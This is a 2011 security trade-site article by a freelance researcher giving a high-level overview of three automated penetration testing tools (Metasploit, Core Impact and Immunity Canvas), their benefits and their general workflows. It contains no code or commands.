In recent times, one of the major improvements in the field of hacking has been the development of a range of tools for uncovering vulnerabilities. A vulnerability scanner can detect loopholes, but these loopholes then have to be exploited manually. On the other hand, automated penetration testing tools are
Requires Membership to View
To gain access to this and all member only content, please provide the following information:
By submitting your registration information to searchSecurity.in you agree to receive email communications from the TechTarget network of sites, and/or third party content providers that have relationships with TechTarget, based on your topic interests and activity, including updates on new content, event notifications, new site launches and market research surveys. Please verify all information and selections above. You may unsubscribe at any time from one or more of the services you have selected by editing your profile, unsubscribing via email or by contacting us here
- Your use of searchSecurity.in is governed by our Terms of Use
- We designed our Privacy Policy to provide you with important disclosures about how we collect and use your registration and other information. We encourage you to read the Privacy Policy, and to use it to help make informed decisions.
- If you reside outside of the United States, by submitting this registration information you consent to having your personal data transferred to and processed in the United States.
equipped with quality exploits as well. Since the process of manual
exploitation could produce improper results or cause the applications to crash, automated pen-test
tools are considered to be more reliable and effective.
Benefits
- Automated penetration testing tools have robust, high-quality exploits that are tested and proven; the tools are also frequently augmented with additional exploits.
- They provide replicable processes that ensure consistent results.
- One can focus on the process rather than having to experiment with exploits, thus saving time. Further, the professional framework reduces the chances of testing false exploits over a particular application.
- Reports are automatically produced and are customizable.
Here is a look at three popular automated penetration testing tools — Metasploit, Core Impact and Immunity Canvas.
Metasploit
Metasploit is an open source framework created by H D Moore. It is written entirely in Ruby, and contains a comprehensive range of exploits and payloads required for testing vulnerability of a remote system. Metasploit can be used for both legitimate as well as unauthorized activities.
The basic steps for exploiting a system using the Metasploit Framework include:
1. Choosing and configuring an exploit for a specific target. Metasploit has over 300 exploits for various operating systems.
2. Checking whether the intended target system is vulnerable to the chosen exploit.
3. Choosing and configuring a payload. A payload is essentially code that will be executed once the targeted system gets compromised — for example, remote shell.
4. Executing the exploit.
There are several other options available for advanced exploiting. Metasploit also helps in testing and developing of exploits.
Figure 1. Metasploit. [Reference: http://www.metasploit.com]
Core Impact
Core Impact, another popular penetration testing tool, is available at a price. Core Impact can be used to perform exploits on a wider range of networks and Web applications than Metasploit. With Core Impact, a few clicks of the mouse are all one needs to launch the network penetration testing process, and obtain summary reports and output logs on completion.
Core Impact has a unique feature known as pivoting. This is a concept that allows a compromised host to launch exploits against other machines. This method is handy for gaining access to a target network that is blocked by a firewall. One can upload files or gain backdoor entry to the host, obtain data and then cover up one’s tracks. The basic steps for using this tool are:
- Information gathering
- Attack and penetration
- Local information gathering
- Privilege escalation
- Cleanup
- Report generation
Figure 2. Core Impact. [Reference: http://www.coresecurity.com]
Immunity Canvas
Another penetration testing tool available in the market is Immunity Canvas, which is written entirely in Python. It supports both Windows and Linux platforms. One of the unique features of Canvas is its dynamic shellcode generator, known as Mosdef (“Most definitely”). This feature helps penetration testers change the shellcode dynamically, and is very useful because debugging of shellcodes inside exploits can be difficult as well as time-consuming. Canvas also incorporates a “convert slide” that can be used in the fragmentation of exploits in order to make detection by an intrusion detection system (IDS) difficult.
Canvas provides options to write new exploits or use the shellcode generator, and these exploits can be put together into a Canvas module. The exploit library is also updated regularly. Another intelligent option in Canvas is the fast, stateless scanner known as scanrand, useful for stateless host-discovery and port scanning. Extremely fast and highly reliable, it uses cryptographic techniques to prevent any manipulation of scan results.
Canvas is a great tool for penetration testing, as well as exploit development, although it is not as easy to use as Core Impact.
Figure 3. Immunity Canvas [Reference: http://www.immunitysec.com]
About the author: Harikrishnan R is a freelance security researcher with an interest in Web app vulnerabilities, as well as the founder of TopSecure (an infosec startup). He has also started "Internet guardians", an initiative to protect Websites.
This was first published in May 2011